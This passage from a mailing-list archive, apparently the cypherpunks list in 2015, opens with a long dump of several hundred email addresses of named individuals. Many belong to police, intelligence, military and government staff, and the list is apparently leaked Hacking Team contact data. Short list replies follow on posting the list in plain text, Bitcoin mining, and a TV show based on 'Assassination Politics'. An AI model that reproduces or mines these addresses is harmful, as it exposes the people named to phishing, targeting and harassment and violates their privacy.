mikko.hypponen at f-secure.com milcomete.serban at gmail.com milkexploit at gmail.com millerdsss at yahoo.com milosstr at centrum.cz Milosstr at centrum.cz minarikovap at ctu.cz min.coord at hcilondon.in mirwais_786 at yahoo.com miso.kanlic at policija.si mj.kyawzaya at gmail.com MJRay at uspis.gov MJ.Ronkes at mindef.nl mk7029 at ukr.net mkaubrey66 at gmail.com mkorajac at otc.hr mm.venderbosch at mindef.nl mnkhzrg at gmail.com modu at thaliasolutionsltd.com moedjiono at gmail.com moh.almshali at gmail.com mohamedfadzlee at gmail.com mohamedfarok at gmail.com mohdamran at rmp.gov.my mohdbinhatem at hotmail.com mohdkhairudin at rmp.gov.my mohdnasmi at rmp.gov.my mohdsyukri at cmc.gov.my mohlomit at gmail.com moi_lawyers at hotmail.com molayem.daniel at gmail.com monang at nenggala.co.id moneimam at hotmail.com montoyaj at bbfl.us morganb at chesterfield.gov morio1950 at yahoo.co.uk mork at ork.it moshe at avorniga.com Moshe at PolarisStar.co mosoeup at saps.org.za mospolice at petrovka38.ru mouaad.benyammi at mbis-INC.net mourahead at gmail.com moussa.mousselmal at mbis-inc.net mpantastico at iom.int mr.1101 at gmail.com m.rios.pt at gmail.com mrkvidal at yahoo.com mr.mgl3 at yahoo.com mrowe at dps.state.ia.us mshall at meatel.com msibani at gmail.com ms at tnsservice.kz msuhaimi at rmp.gov.my mtarko at jibc.ca mt_ndombol at yahoo.fr mtrump at jibc.ca m.tsatsaris at cybercrimeunit.gr muhammad.prayoga at kpk.go.id Muhammad.Taimur at gmail.com muhdzulkifly at rmp.gov.my mukti at hasil.gov.my muneifnm at yahoo.com Mun-Wai.Hon at noblis.org muradyusof at gmail.com muscat70 at yahoo.com mushtaqmahar at gmail.com mushtaqmahar at hotmail.com musicjeff at optonline.net mustafar.ali at sprm.gov.my mustard at kcc.go.kr muttaqin at cybersecurity.my muworobben at yahoo.com mvsrepin at gmail.com mwmiller at ocsd.org mythilymayi91 at gmail.com nabeel at i-gss.com nadia.hamdane at hotmail.it nagwasadik at hotmail.com naif at moisp.gov.sa najimani at yahoo.com nalhamar at ssb.gov.qa narcopol at adinet.com.uy narunas at eksinta.lt nashiat at aman-infosec.com nasir.embee at gmail.com nasmit79 at gmail.com nasser.com at gmail.com nastasimarco at gmail.com natale.barate at antonveneta.it Natasha.D.Taylor at ice.dhs.gov nati.honigman at gmail.com naveen.jaiswal at veheretech.com nawa.silwal at gmail.com nazareno.saguato at areamcr.com necmi at bbsb.gov.tr neemann at dany.nyc.gov neil.banks at mfat.govt.nz NEO_Kok_Lee at mha.gov.sg neri.brutzkus at verint.com news at alessandrorossi.biz newsletter at richard-spreng.com ng.burger at belastingdienst.nl nicholas_chong at rmp.gov.my nick.boffi at fairfaxcounty.gov nick at dogflag.net nick_stevens4 at yahoo.com nicola.modena at phoenixspa.it nicola.satalino at ducati.com nikehasroun at me.com nikezanee at rmp.gov.my nikmat at mod.gov.my nileshkirti at hotmail.com nils.petter.bruknapp at politiet.no nisar at pta.gov.pk niss2007et at gmail.com nkmoc at yahoo.com nks at semcoindia.com n.mengoudis at cybercrimeunit.gr NMwakalyelye at yahoo.co.uk nnikitovic at gmail.com noelck at dps.state.ia.us normanglbrt at yahoo.com norman.needle at ic.fbi.gov norrejalinawati at gmail.com norzaaimah.johari at mindef.gov.bn nosgib at gmail.com novy at npdc.cz npa_amaraa at yahoo.com npetershumes at uspsoig.gov n.squillace at ljlex.com nstout at cta-net.com ntalegilbert at yahoo.co.uk ntamburrino at wb.hidta.org nur.hidayati at kpk.go.id nyagwende at yahoo.com nymbus.broome at gmail.com nypdcentralrobbery at gmail.com oad at nbi.gov.ph oboulhas at yahoo.fr oco03 at co.henrico.va.us ofersc1 at gmail.com ofer.skarbin at gmail.com o.galani at cybercrimeunit.gr OH_Chee_Yong_Zack at starnet.gov.sg ohr at rosberg.no ohtoshi at gmail.com oik22 at mvcr.cz oik26 at mvcr.cz ojcerratoc at yahoo.com ojianwen at dsta.gov.sg o.koc at mrd.com.tr oksana.petrusyk at fco.gov.uk olegask at stt.lt o.lessire at gmail.com oletiloek at gmail.com ologunro at gmail.com olomu_bo at customs.gov.ng oma001 at politi.dk omegazak at ath.forthnet.gr omps.tichak at gmail.com omrik at nice.com omusopelo at yahoo.com onestopcenter1234 at gmail.com Ong_Boon_Hoe at spf.gov.sg ong.chinhock at csit.gov.sg ong_seng_hock at cpib.gov.sg opjibbs at gmail.com opmail at hotmail.com oppzindi at yahoo.co.uk ori.nurick at nice.com orlando.james at ukti.gsi.gov.uk orozali at yandex.ru osama.altimimi at gmail.com oscaralbertoq at gmail.com osint at forces.gc.ca osmawi.osman at narcotics.gov.bn otavicunha at gmail.com otb at vp.gov.lv otsayi at yahoo.com otto.kern at group2000.eu ovais at tele-logic.com.pk p02590 at aacounty.org p1949q at gmail.com p91223 at aacounty.org p91329 at aacounty.org p91331 at aacounty.org pa8060 at vsd.lt pableins_810 at hotmail.com pam at bkforensics.com PAM.Lokkart at mindef.nl panar.80 at yandex.ru Paolo.Lucietto at Pensplan.com paolo.mandelli at areamcr.com Paolo.mattarello at gruppoitas.it paolo.muraro at humanitas.it paolo.russo at ubiss.it #papp at mail.datanet.hu papp at cryptor.hu pasha5163 at hotmail.com pasi.hanninen at ficora.fi pat.mason at homeoffice.gsi.gov.uk patrice.rault at alcatel-lucent.com patrick.ghion at police.ge.ch patrickq at saps.gov.za paul.garbin at afp.gov.au paul.mocr at seznam.cz paulo.cardeal at sigmawiseservices.com paul.spek at rijnmond.politie.nl paul.wessels at rst-politie.net pavelka at px.mvcr.cz pavel.laptev at ekei.ee pbez01 at gmail.com p.brundu at lia.it pcasano at hotmail.com pcobb66 at yahoo.com pedjoeangolahraga at yahoo.co.id pedro.oliveirinha at hotmail.com pellevrr at gmail.com pe.nic1 at gmail.com pervaizaslam at gmail.com peter at eiast.ae petrk at px.mvcr.cz petrk at uzsi.cz petrovay.miki at gmail.com pfita at hotmail.co.uk pgazwasa at brunet.bn pgjefri.hamid at police.gov.bn phil.carrai at kratosdefense.com philip.danso at bog.gov.gh philippe.schneider at ar.admin.ch philippe.schneider at armasuisse.ch phineas.young at dc.gov pialfg at gmail.com pichai at netsurplus.co.th pierre.courbon at finances.gouv.fr pierre.mangin at gmail.com pieterman8 at hotmail.com pietro.peterlongo at gmail.com pietro.ranieri at fondiaria-sai.it pinder.cheema at gov.bc.ca pinkheni at yahoo.com pinto.canc at gnr.pt pisano.roberto at gdf.it pischke at bundpol.de pjois63 at yahoo.com pkotch at hotmail.com pmpmmm at hotmail.com pol2-1 at abud.auswaertiges-amt.de polis at bkm.com.tr pomare.w at gmail.com pompeo.santoro at ericsson.com popescu_catalin1 at yahoo.com posca.antoniodomenico at gdf.it poststelle at fa-chemnitz-sued.smf.sachsen.de poststelle at verfassungsschutz.hamburg.de pp-mue.muenchen.k102 at polizei.bayern.de ppotter at sbcsd.org pradas at securetech.ae prahakim at gmail.com pramakorwane at gov.bw prescon at gmail.com president at ecips.eu privileges.escalation at gmail.com prosa at icbpi.it psergio.horus at gmail.com psleong at fsm.gov.mo ps.mincoord at hcilondon.in ps.mineco at hcilondon.in psotomayor at polariswireless.com pthomas at voxtronme.com pulverich at digitask.de pvmaier at gmail.com pv_vidmail at videotron.ca pzopl at minbzk.nl qtongsoo at dso.org.sg quentin.revell at homeoffice.gsi.gov.uk quinnbj at saic.com raabm at t-online.hu raalshehhi at scad.ae rabasa at rand.org rachid_kamiri at yahoo.com rachmad.andika at kpk.go.id radam at ctu.cz radhakrishnan_ips at yahoo.co.in raf_1970 at yahoo.com rafaelkarina33 at gmail.com raffaie.juned at kdn.gov.bn rajan at s3tel.com rajeev.per at gmail.com rajendran at rmp.gov.my raj.shah at alcatel-lucent.com ramid at linear.it ramon at c3mx.com ramzi.touma at citg.com.lb raoul.ueberecken at mae.etat.lu rashid at hemaya-ds.com rauli.paananen at ficora.fi ray.allen at ocfl.net ray.dauzat at dhs.gov raymondarcher7 at yahoo.com rbarnes at uspsoig.gov rbenedetti at cte.it rbocock at pfpa.mil rbogan at ivytech.edu r.borsato at equitasim.it rc46fi at googlemail.com rds at isghq.com re9za at yahoo.com regina.a.chiurco at verizon.com rei at heise.de reinhold.brunner at np-channel.com relint.dga at mai.gov.ro remzinoyan at yahoo.com renato.ceccarini at airc.it renaud.raymond at interieur.gouv.fr rene.koch at isc-ejpd.admin.ch renni at s3tel.com renzo.rossi at gruppomarcegaglia.com reolson at gmail.com restoran1234567 at gmail.com reyg13 at gmail.com #reza at cybersecurity.my reza.shariff at petronas.com.my rgostinski at gmail.com rgyuri72 at gmail.com rhansen at sbcsd.org rhinfelaar at gmail.com ricardo_pail at yahoo.com riccardo.raffo at gruppomg.com ricciardi.massimo at gdf.it richard.a.rose at navy.mil richard.coppens at group2000.eu richard.grundy at L-3Com.com Richard.page at avizent.com richard.parks at navy.mil Richard.Petrey at Boeing.com richardsona at henricopolice.org richdin at gmail.com rick at 10101tech.com rieasinfo at gmail.com rihanmvsc at gmail.com rinatsaig at gmail.com rino.zaccaria at sipra.it risoft at ppcr.cz rizuan.rahim at gmail.com rkbruiser at hotmail.com rkmiller at co.pg.md.us rmarksster at gmail.com rmnkhan at gmail.com rmoss at umpd.umd.edu rmugerwa at umpd.umd.edu rnewman at sheriffleefl.org RNewman at sheriffleefl.org robert.betkey at dhs.gov robert_hartner at raiffeisen.it robert.j.betkey at ice.dhs.gov robert.kemmetii at okc.gov robert.loproto at dc.gov roberto.apollonio at h3g.it roberto at dlbx.nl roberto.doveri at fondiaria-sai.it roberto.izzi at mail.wind.it roberto.paleari at gmail.com roberto.pozzuolo at sella.it roberto.santos at rodesa.com.mx robertrules at hotmail.com robin.williams at cincinnati-oh.gov rob.lee at navy.mil rockamcool at rediffmail.com rodolfo.r.isotta at gsk.com rodrigo.balada at gmail.com rodrigodqd at gmail.com rodrigo at kernelhacking.com rodrigo at rlima.org rodriguez_ed at bah.com rogerchua1981 at gmail.com roger.flury at fedpol.admin.ch rohaizad at sprm.gov.my rojaserik1 at gmail.com rolandasb at stt.lt roland.doele at minbzk.nl roman at sis.gov.sk romeuportugal at gmail.com romy.wuttke at adytonsystems.com ronald.benson at leo.gov ronald at fvc.com ronald.howell at alcatel-lucent.com ronyg at itpgroup.com ropere at dany.nyc.gov rosen_gm at abv.bg rose.weisdorfer at dodiis.mil rossais at gmail.com rosso at rai.it rossr at ccso.us rostam at bpe.jpm.my roubaelhelou at hotmail.com roxine.ciacco at doj.ca.gov royo90 at yahoo.com rpenaariet at umpd.umd.edu RPinetti at credem.it rrega at tntitaly.it rsalmario at gmail.com r.schipani at interpol.int rtbaer at aol.com rtomlinson at ci.omaha.ne.us rtruitt at annapolis.gov rudin.amir at gmail.com rudolf.janda at atlas.cz rudolf.winschuh at aachen.utimaco.de rudsun.kongrugsa at gmail.com rudy.hartono at gmail.com rujioiu.adrian at gmail.com runnerscoot at yahoo.com rustrade at verizon.net rwadhwa at SS8.com rwarren at anaheim.net rxfutr at gmail.com ryanc.dhs at gmail.com ryan.cox at wyo.gov ryansuan at hotmail.com ryftsui at ops.icac.org.hk sa3eed0007 at hotmail.com sabine.berghs at googlemail.com sablenamibia at gmail.com sachin at s3tel.com sadieqah.mohamed at gmail.com saeedaldehail at ssdd.gov.ae sahpurung at yahoo.com saiful.ezuan at nuemera.com saiful_s at rmp.gov.my saleh.alali at dubaipolice.ae sales at zte.com.cn salihpasha at hotmail.com salim.matine61 at hotmail.ca s.alma.4 at hotmail.com salman.shahryari at cyber-wall.com sami.almamri at gmail.com samirboustani at hotmail.com samnkadi at yahoo.com samuel.messinger at usss.dhs.gov samuel.shult at dia.mil sanabriafabio.py at gmail.com Sananemhmt at gmail.com sanjeevshami at gmail.com santiagoroserom at hotmail.com sarifudin at rmp.gov.my sarinkem at hotmail.com sar.ratha at gmail.com saulparks95 at yahoo.com savino.guarino at carabinieri.it sbgranado at gmail.com sblankenship at cityofbethel.net scaletta.salvatore at gdf.it scdodelta at gmail.com scott.moffitt at usss.dhs.gov scott.s.marvin at dhs.gov scott.sube at montgomerycountymd.gov sean.mccarthy at wvc-ut.gov seeweew at yahoo.com segeint at gmail.com selcuk2001 at gmail.com sentra0965 at yahoo.co.id serdaryildiz99 at gmail.com sergej.chaniutko at policija.lt sergio.mariotti at interno.it sergio.porro at argoclima.com sfrashed at tcc-ict.com sgkang at etri.re.kr sgokcetin07 at gmail.com shailesh.h.singh at gmail.com Shalevidc at gmail.com s.h.alharbi at gmail.com shamsinar_e1 at yahoo.com shankarjiwal at hotmail.com shannon.ferrucci at jhuapl.edu shark2g6 at yahoo.com shawnfbrown at hotmail.com shawn.kaderabek at ci.irs.gov shawn.plunkett at ps.gc.ca shehuagbabs at yahoo.co.uk shelia.dedeaux at sprint.com Sheltonraphaela at hotmail.com shen3333 at seed.net.tw s.hernandezlainez at interpol.int shimelst_2003 at yahoo.com shintariyanti99 at gmail.com ship1208 at gmail.com shnyfy at yahoo.com sholaog at yahoo.com shosking at telesoft-technologies.com Sidney.Laurenceau at usss.dhs.gov SIEMMANUEL at DPSCS.STATE.MD.US simeunovics at gmail.com simone.gabbianelli at goodyear.com simone.maga at mediolanum.it simone.tacconi at interno.it Siri.nccc at gmail.com siripornv at gmail.com sironi.francesca at gmail.com siswabruderan at yahoo.co.id skatsarov at cybercrime.bg sk-hkv at mil.se skhorana78 at hotmail.com s.laczkowski at wp.mil.pl smail.lassakeur at mbis-inc.net smart_motion at yahoo.com smoriarity at verizon.com smtaylor at mitre.org snalampang at hotmail.com snowhill at eim.ae S_Nwokedi at yahoo.com sofar21 at gmail.com sohailzaf at yahoo.com sonat1976 at yahoo.com sonic_awi at yahoo.com sonsfour at gmail.com sorynnet at yahoo.com sotiris.leontaris at fco.gov.uk spalmer at ncmec.org special.dga at mai.gov.ro spesl at seznam.cz spikebowman at verizon.net spmeach at yahoo.com sprite.lol at gmail.com spsuchn at cbi.gov.in spyconsulting at gmail.com spykds at yahoo.com srblad at srblad.cz SR.Boogaard at mindef.nl srehman at etisalat.ae s.rota at bipielleict.it sscofield at weldsheriff.com s.suhairi at yahoo.com staci.richards at fairfaxcounty.gov staff at hackingteam.it stamas1702 at yahoo.com stanley_seah at cnb.gov.sg stefano.cremonini at hotmail.com stefano.molino at innogest.it stefano.pagani at mail.wind.it stefano at quintarelli.it stefano.regnani at casalgrandepadana.it steije at pine.nl stengshe at dso.org.sg Sten.Lundell at ericsson.com stephane.van.roy at ibpt.be stephan.margolis at LAPD.LAcity.org stephen.ciampichini at us.army.mil stephen.hollifield at richmondgov.com Stephen.Needels at FairfaxCounty.gov steve_lynchard at agilent.com steven_JB2003 at yahoo.co.uk steven.linner at afp.gov.au steven.l.spak at verizon.com steven.wuytack at dhs.gov stimmermans at inspectieszw.nl Stivovo at gmail.com stuart.carpenter at soca.x.gsi.gov.uk stuart.laurie at spsa.pnn.police.uk subramaniam_r at rmp.gov.my sufian.sabtu at gmail.com sultanm13 at yahoo.com sulyna at cmc.gov.my suprawin at hotmail.com suresh570 at yahoo.com suresh.rana2011 at gmail.com suria at cybersecurity.my sutherkifier at gmail.com sven.brandt at esk.fraunhofer.de Sverker.Adolfsson at saabgroup.com swastika at nic.in swcarter at ncsu.edu s_welldone at yahoo.co.uk syani_jb at yahoo.co.id syedmohdnabil at gmail.com syktse at ops.icac.org.hk syli at szvc.com.cn szalay.jeno at telekom.hu szigdon at 013.net taale at mac.com taas1 at hotmail.com tabish2001 at gmail.com tabish2001 at hotmail.com talbert at shfederal.com tald at circles.bz talucas at telestrategies.com talulman1 at gmail.com talzaabi at adpolice.gov.ae tamir_t at iaac.mn tan_chye_hee at spf.gov.sg tandin05 at gmail.com tanilchin at yahoo.com tankl at pcs-security.com tan_wei_chong at starnet.gov.sg tarafas.tamas at nav.gov.hu Tarek.Malik at gmail.com tareq.wafa at tricomholdings.com tatsunobu.aoki at mofa.go.jp tau_assassin at hotmail.com tautakpe82 at yahoo.com.sg tcole at ocrnsp.com tdrumheller1 at verizon.net tech1 at nsa.gov.bh TEgressy at mfa.gov.hu teguh.arifiyadi at gmail.com tehnic.dga at mai.gov.ro tekerina at yahoo.com Teklebrhana at yahoo.com tenceltavares at hotmail.com teresita.smith at dodiis.mil tero.kariaho at poliisi.fi terryl at cellebrite.com terzo.cid.cmdr at smd.difesa.it THernandez-Walter at annapolis.gov thiago.araujo02 at gmail.com thinchiong.ng at narcotics.gov.bn thirunatps at yahoo.co.in thodgson at co.kern.ca.us thomas.belcher at dhs.gov thomas_david at bah.com thomas at digitask.de thomas.hoppe at eim.ae thomas.j.belcher at ice.dhs.gov thomas.kk.che at pj.gov.mo thomas.lopez at iridium.com thomas.messerer at esk.fraunhofer.de Thomas.Poliseno at ic.fbi.gov Thomas.sullivan at dc.gov thomasy at seccom.com.my thonysitumorang at msn.com thor-inge at vaaga.net tick2986 at yahoo.com tieuthienvan134 at yahoo.com tiger82ph at gmail.com tiggersbounce98 at yahoo.com tim.cummings at tnccorp.com tim.mizee at haaglanden.politie.nl Timo.Mix at polizei.bwl.de tironi.stefano at lonati.com tissatobing at yahoo.com titilari2000 at yahoo.com.au t.kebbal at mptic.dz t.mansutti at mansutti.it tobias.morawe at polizei.niedersachsen.de tobo95 at seznam.cz tobyo1234 at gmail.com todd.perkins at dc.gov tok8 at hotmail.com tollet at qosmos.com #tomas.copete at gencat.cat cristian.borrella at gencat.cat tomas.hook at gmail.com tomas at policija.lt Tom.Beers at FCC.gov tom at cellularforensics.com tomer at defensiveshield.com tomreimer at gmx.de tonggosimanjuntak at yahoo.com tonino.calzolari at csebo.it tony.cheatham at dhs.gov tonykah at yahoo.com tony.tortora at ice.dhs.gov Tony.Tortora at ice.dhs.gov torben at eiast.ae towerje at state.gov townsj at horrycounty.org t.peine at bfv.bund.de t_rajen at yahoo.com travis.d.rogers at boeing.com trevino1331 at gmail.com trogers at drti.com T.STOOP at Mindef.nl ttizer2001 at yahoo.com tucker.kleitsch at uscp.gov tumay84 at gmail.com turyildirim at yahoo.com tvincenzetti at it.amadeus.com tyler.grigery at oci.fda.gov uaelive at gmail.com ubilla30 at hotmail.com ueda-tatsuo at mhlw.go.jp uellepola at etisalat.ae ujavka at yahoo.com ulrich.krumme at ic.fbi.gov ulziibadrakh.a at gmail.com umberto.arrighini at beretta.com Umberto.farina at coster.com ums at fskn.gov.ru unal.tatar at tubitak.gov.tr urseacata at yahoo.com usman at communicatorsglobe.com uyanga1031 at yahoo.com v_13 at hotmail.co.uk vakassi at nab.gov.pk vale at corner.ch valto at inet.it VanCAssoc at aol.com vat2001 at volny.cz veille.techno at interieur.gouv.fr ventas at ferbel.com verahmnisi at yahoo.com veraya0912 at yahoo.com vernetti at rai.it vernida.long at uscp.gov veronica.miranda at ic.fbi.gov vescovid at horrycounty.org vg182008 at yandex.ru v.gelosa at cassalombarda.it vicki.pocock at ic.fbi.gov victor at packetforensics.com victor.watson1 at dhs.gov vijis at voxtronme.com vikas_its at yahoo.com vild at bis.cz villa_marco at mtsspa.it vi at minbzk.nl vineet.sachdev at ss8.com vineetS at SS8.com visky.gabor at kfh.hu vitaly.kiktiov at gmail.com vladgeorge.mnd at gmail.com vladimirdj at bia.gov.rs vladimir_fedorov at meta.ua #vladimir.remenar at fpz.hr vladimir.remenar at gmail.com vladimir.sloup at uzsi.cz v_morari at hotmail.com v.mumladze at mia.gov.ge vojko.urbas at policija.si volzjp at state.gov v.politopoulou at cybercrimeunit.gr vusinong at yahoo.com waghraj at gmail.com waghraj at hotmail.com wailin at redlinkmm.com waitingforyou134 at yahoo.com.vn waleed.therwi at gmail.com walyonohw at gmail.com Wandella.Fields at dc.gov wanmaliq at rmp.gov.my wanni at etri.re.kr wanzul11 at yahoo.com warith at digi77.com warren.a.a.williams at gmail.com warren.clarke at jcf.gov.jm warren.williams at jcf.gov.jm wducklow at ftc.gov wee_thiam_poh at cnb.gov.sg Wendie.Nutt at ontario.ca wendi.m.casteel at boeing.com wendy.clayton at us.army.mil westphal at visualanalytics.com WGAvdKooij at Gmail.com WGA.vd.kooij at mindef.nl wh.chan at pj.gov.mo wideideal at etri.re.kr wilbert.paulissen at klpd.politie.nl william.heverly at montgomerycountymd.gov will.metters at met.police.uk wim.fokke at group2000.eu wing.leung at rci.rogers.com winston.fullinfaw at peelpolice.on.ca wlagana8 at gmail.com woints at yahoo.com wrightjs at state.gov wtauqir at pta.gov.pk xavier.antonelli at interieur.gouv.fr xelabayu at yahoo.co.id xlovette at yahoo.com yacoub at alsaleh.com.kw yadavadhikari at hotmail.com yasir.taha at dodiis.mil yassine.rakhif at gmail.com yawar at pta.gov.pk y.elnajjar at gmail.com yllar.lanno at ekei.ee younes at ssdd.gov.ae yousaf885 at gmail.com youssodbb at yahoo.fr yudhistira.yusuf at gmail.com yuriandi.herlambang at gmail.com Yuval.altman at verint.com zaaaaf at gmail.com zabri at cybersecurity.my zadrazil at ppcr.cz zahari at rmp.gov.my zainal_a at rmp.gov.my zakaria_s at rmp.gov.my zarbonib at smtp.gc.ca zarie6153259 at gmail.com zdenek.svoboda at trade.gov zhokhov at speechpro.com zilahi.tibor at kfh.hu zircpt at gmail.com ziv.levi at verint.com z.maakouf_DMT at algeriepolice.dz zoldp at ctu.cz z.ttaye at gmail.com zulkifliali at rmp.gov.my zyadk73 at gmail.com 3ishah.al.ali at gmail.com ahmad.mohd331 at gmail.com Celli at franciscopartners.com Spetzler at franciscopartners.com info at ess-consulting.com minerva at ess-consulting.com. voulnet at gmail.com fagner.pmdf at gmail.com antonysantos456 at gmail.com sgtherasmo01 at hotmail.com renk at cdciber.eb.mil.br javersa at mprj.mp.br celio.silva at pmmg.mg.gov.br lgasperin at modulo.com brandon.m at pervices.com igor.pipolo at alasbrasil.com.br bruno at ofca.com.br renan.cabral.rj at hotmail.com bastos at gcm09.mar.mil.br erika.r.rizzo at gmail.com walid1990 at live.it diego.cazzin at gmail.com #diego.cazzin at eurasiastrategy.eu Zohar.Weizinger at nice.com ambasciatore.kualalumpur at esteri.it pasquale.montegiglio at am.difesa.it r3u4s2 at sgd.difesa.it nrustam at e-mail.ua shah at mkn.gov.my sempoikl at yahoo.com bahadur at radiant-org.com miftah at iahc.net sandram at gaclaser.co.za nurul.hidanahhisamuddin at baesystems.com f.camastra at ice.it Erez at dragonacehk.com fabrice.godeau at altran.com bob at audio-videointelligence.com bruno.ae at modcom.com.my info at u-r.com.ua namnd at mvcorp.vn elko_heuw at shark-links.com ricoruss1 at yahoo.it anto_2007 at alice.it Andrea.Formenti at area.it ekuhn at beckerglynn.com luca.filippi at seclab.it michael_ong at pcs-security.com fulviodegiovanni at gmail.com Gorev at franciscopartners.com nicolas.escher at baumarep.ch rashidah at mkn.gov.my maliki at bpe.gov.my kko2006 at gmail.com martin.friedli at gs-vbs.admin.ch roger.flury at fedpol.admin.ch tlj.stoop.01 at mindef.nl dmaretic at otc.hr #carlasuc_igor at mail.ru christian.geissler at bka.bund.de michalek at polac.cz vrtiskova at okfk.cz ati at dcti.ro mchiorcea at pna.ro alexandru.ciobanu28 at gmail.com ukr_defat at ukr.net fedorov_vladimir at ukr.net remigijusv at aotd.kam.lt #7vko at mail.ru #rk_mvd at bk.ru pasha5163 at hotmail.com #jody.revets at usse.bl From list at sysfu.com Fri Jul 10 00:17:57 2015 From: list at sysfu.com (Seth) Date: Fri, 10 Jul 2015 00:17:57 -0700 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: <20150710070020.GF61602@r4> References: <20150710070020.GF61602@r4> Message-ID: On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote: > Wouldn't it have been enough to post the url? > > http://ptrace.fefe.de/fpalm30c3.jpg I actually appreciate content posted in message, get tired of having to fire up a browser for links. Also every click on a browser link is a potential attack whereas plain-text in an email is not. From list at sysfu.com Fri Jul 10 01:23:37 2015 From: list at sysfu.com (Seth) Date: Fri, 10 Jul 2015 01:23:37 -0700 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: <20150710075127.GG61602@r4> References: <20150710070020.GF61602@r4> <20150710075127.GG61602@r4> Message-ID: On Fri, 10 Jul 2015 00:51:27 -0700, Tom wrote: > Normally I'd agree. But in this case it's different imho. Nobody knows > if I read the list posted on wikileaks since the access is tls > encrypted. However, now that the whole list has been posted by mail in > the clear, everyone sniffing on my mail traffic knows that I've got it. Makes me wonder if receiving that list of hacking team emails could actually increase your perceived 'threat level' beyond the one assigned for being subscribed to cpunks or visiting the Tor project web site for example. BTW, yer domain's mail server STARTTLS setup is kind of crappy according to starttls.info [1]. Maybe you could tighten that up to protect against future cpunks emails packed with juicy bits. [1] https://starttls.info/check/vondein.org From mirimir at riseup.net Fri Jul 10 03:10:21 2015 From: mirimir at riseup.net (Mirimir) Date: Fri, 10 Jul 2015 04:10:21 -0600 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> <20150710075127.GG61602@r4> Message-ID: <559F9A0D.3020605@riseup.net> On 07/10/2015 02:23 AM, Seth wrote: > On Fri, 10 Jul 2015 00:51:27 -0700, Tom wrote: >> Normally I'd agree. But in this case it's different imho. Nobody knows >> if I read the list posted on wikileaks since the access is tls >> encrypted. However, now that the whole list has been posted by mail in >> the clear, everyone sniffing on my mail traffic knows that I've got it. > > Makes me wonder if receiving that list of hacking team emails could > actually increase your perceived 'threat level' beyond the one assigned > for being subscribed to cpunks or visiting the Tor project web site for > example. OK, how many remember waiting for a subpoena during Jim Bell's trial? Me, I'd subscribed through a remailer ;) > BTW, yer domain's mail server STARTTLS setup is kind of crappy according > to starttls.info [1]. Maybe you could tighten that up to protect against > future cpunks emails packed with juicy bits. > > [1] https://starttls.info/check/vondein.org > From mirimir at riseup.net Fri Jul 10 04:01:28 2015 From: mirimir at riseup.net (Mirimir) Date: Fri, 10 Jul 2015 05:01:28 -0600 Subject: cypherpunks Digest, Vol 25, Issue 9 In-Reply-To: References: Message-ID: <559FA608.8010200@riseup.net> On 07/10/2015 04:25 AM, ksenia bellman wrote: > on the topic of Bitcoin philosophical musings and pressures: > > There unusually a lot of btc discussion on the list lately: technical (the > fork), philosophical and practical. > > On the philosophical/political side: btc is great, I like it, I use it, > but, come on, we all know that by design (increasing difficulty of the > chain and proof-of-work system) btc is determined to be a space race. > Before you can maintain the network with simple hardware, and get btc for > it, now you have to be a mining rig. We know that btc is good for P2P > financial transactions, but the first important question now is: > How do you earn bitcoin? (as an individual, you can't mine, if you are not > a programmer or a designer, how do you earn btc?) > It becomes less and less of a question how do you spend btc, but still, > unless I mined a lot in the past or bought it for cash, where do I get it? Yes, mining by individuals hasn't been feasible for some years. And there aren't that many ways (so far) to earn Bitcoin. So most users will need to buy Bitcoin. If anonymity doesn't matter much, that's generally not very hard. From Rayzer at riseup.net Fri Jul 10 07:30:09 2015 From: Rayzer at riseup.net (Razer) Date: Fri, 10 Jul 2015 07:30:09 -0700 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> Message-ID: <559FD6F1.5060604@riseup.net> On 07/10/2015 12:17 AM, Seth wrote: > On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote: > >> Wouldn't it have been enough to post the url? >> >> http://ptrace.fefe.de/fpalm30c3.jpg > > I actually appreciate content posted in message, get tired of having > to fire up a browser for links. Also every click on a browser link is > a potential attack whereas plain-text in an email is not. > Riseup flagged it as potential ***Spam***, despite normally having no problem with coderman's postings b/c 'links'. Just b/c 'plaintext' means you don't have to risk a click doesn't mean what's in the text (and all that may come from receiving it) is 'un-monitored'. RR https://www.youtube.com/watch?v=hkXHsK4AQPs Ps. Old enough to remember when Ozzie had pimples -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From jdb10987 at yahoo.com Fri Jul 10 00:40:38 2015 From: jdb10987 at yahoo.com (jim bell) Date: Fri, 10 Jul 2015 07:40:38 +0000 (UTC) Subject: Deathrow Democracy Message-ID: <1419622931.2858212.1436514038928.JavaMail.yahoo@mail.yahoo.com> Months ago, I discovered a TV-show in the making, called "Deathrow Democracy".  Apparently it is a fictionalized treatment of Sanjuro's 'Assassination Market', as well as my 'Assassination Politics' essay.  I just found they have a Facebook page at:  https://www.facebook.com/deathrowdemocracyThey have a web page at:   http://deathrowdemocracy.com/Teaser #1 at:  https://www.youtube.com/watch?v=okmZdquYCjETeaser #2 at:  https://www.youtube.com/watch?v=OnDaDlOJDTY It appears that they are scheduled to release something on July 31, 2015.                Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1611 bytes Desc: not available URL: From oshwm at openmailbox.org Fri Jul 10 00:43:00 2015 From: oshwm at openmailbox.org (oshwm) Date: Fri, 10 Jul 2015 08:43:00 +0100 Subject: From: root@hackingteam.it To: vince@hackingteam.it [and who?] In-Reply-To: References: <20150710070020.GF61602@r4> Message-ID: <9E41BD0A-A7CD-469F-BCDE-E5F760EDE9D4@openmailbox.org> Must admit, it was nice to be able to quickly scan the list to identify some of the more interesting addresses to look at in more detail later on today :) On 10 July 2015 08:17:57 BST, Seth wrote: >On Fri, 10 Jul 2015 00:00:20 -0700, Tom wrote: > >> Wouldn't it have been enough to post the url? >> >> http://ptrace.fefe.de/fpalm30c3.jpg > >I actually appreciate content posted in message, get tired of having to > >fire up a browser for links. Also every click on a browser link is a >potential attack whereas plain-text in an email is not. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1055 bytes Desc: not available URL: From tom at vondein.org Fri Jul 10 00:00:20 2015 From: tom at vondein.org (Tom) Date: Fri, 10 Jul 